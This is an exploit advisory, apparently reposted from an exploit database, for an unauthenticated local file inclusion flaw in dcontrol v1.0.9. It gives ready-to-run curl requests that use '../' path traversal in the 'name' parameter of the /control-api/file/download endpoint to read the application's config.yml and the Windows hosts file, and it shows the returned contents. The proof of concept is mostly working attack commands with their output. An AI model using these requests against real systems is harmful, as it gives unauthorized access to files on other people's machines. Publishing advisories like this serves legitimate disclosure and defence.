Share
## https://sploitus.com/exploit?id=PACKETSTORM:219189
# Exploit Title: dcontrol v1.0.9 - Unauthenticated Local File Inclusion
    (LFI)
    # Date: 2026-04-18
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://github.com/dhjz/dcontrol
    # Software Link:
    https://github.com/dhjz/dcontrol/releases/download/1.0.9/dcontrol.exe
    # Version: 1.0.9
    # Tested on: Windows 10, Windows 11
    
    
    # Description:
    dcontrol is vulnerable to Local File Inclusion (LFI) via path traversal in
    the
    /control-api/file/download endpoint. An unauthenticated attacker can read
    arbitrary files from the target system by supplying directory traversal
    sequences (../) in the 'name' parameter.
    
    
    # Proof of Concept:
    
    1. Read the application configuration file:
    curl "http://TARGET_IP:666/control-api/file/download?name=../config.yml"
    
    name: "่ฟœ็จ‹ๆŽงๅˆถ"
    port: 666
    open: false
    volume: true
    dir: files
    apps:
      - name: ๅพฎไฟก
        path: E:\Program Files (x86)\Tencent\WeChat\WeChat.exe
      - name: ็ฝ‘ๆ˜“ไบ‘
        path: E:\Program Files (x86)\NetEase\CloudMusic\cloudmusic.exe
    
    
    2. Read Windows hosts file:
    curl "
    http://TARGET_IP:666/control-api/file/download?name=../../../../../../Windows/System32/drivers/etc/hosts
    "
    
    # Copyright (c) 1993-2009 Microsoft Corp.
    #
    # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
    #
    # This file contains the mappings of IP addresses to host names. Each
    # entry should be kept on an individual line. The IP address should
    # be placed in the first column followed by the corresponding host name.
    # The IP address and the host name should be separated by at least one
    # space.
    #
    # Additionally, comments (such as these) may be inserted on individual
    # lines or following the machine name denoted by a '#' symbol.
    #
    # For example:
    #
    #      102.54.94.97     rhino.acme.com          # source server
    #       38.25.63.10     x.acme.com              # x client host
    
    # localhost name resolution is handled within DNS itself.
    # 127.0.0.1       localhost
    # ::1             localhost